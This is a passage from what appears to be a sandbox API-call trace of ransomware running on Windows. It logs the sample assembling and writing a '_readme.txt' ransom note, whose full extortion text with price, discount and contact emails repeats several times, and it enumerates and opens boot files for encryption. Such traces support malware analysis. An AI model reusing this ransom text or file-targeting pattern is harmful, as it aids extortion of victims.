pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0179.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.044] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0179.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.044] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.044] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.044] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.046] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.047] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.047] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.047] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0179.047] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.048] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.048] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.049] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.049] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 